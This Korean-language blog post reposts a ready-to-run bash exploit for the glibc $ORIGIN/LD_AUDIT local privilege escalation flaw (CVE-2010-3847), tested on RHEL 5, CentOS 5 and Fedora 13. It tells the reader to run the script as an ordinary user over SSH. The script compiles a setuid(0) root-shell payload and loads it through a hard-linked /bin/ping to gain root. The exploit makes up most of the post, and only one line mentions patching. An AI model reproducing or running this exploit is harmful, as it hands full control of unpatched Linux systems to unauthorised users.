반응형
출처: http://cafe.daum.net/redhat/D4GV/17

아래의 스크립트를 실행하게 되면 일반계정으로 root계정의 권한을 획득하게 된다. 

원격지에서 SSH등으로 일반계정으로 접속하여 아래와 같은 명령 집합으로 실행한다.

실행시 일반계정으로 접속후에 실행권한 755와 같은 x 권한을 주고  실행한다. 

이는 취약성이고 이 취약성을 패치하려면  CVE-2010-3847 를 패치해야 한다.


>>적용되는 버젼

RHEL 5.x/CENT OS 5.x/FC 13에서 TEST됨 (glibc버젼에 연관)



get_root_pri.sh



#!/bin/bash
cd /tmp
echo "" > payload.c
echo "void __attribute__((constructor)) init()" >> payload.c
echo "{" >> payload.c
echo "setuid(0);" >> payload.c
echo " system(\"/bin/bash\");" >> payload.c
echo "}" >> payload.c


cat payload.c
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
whoami
반응형

+ Recent posts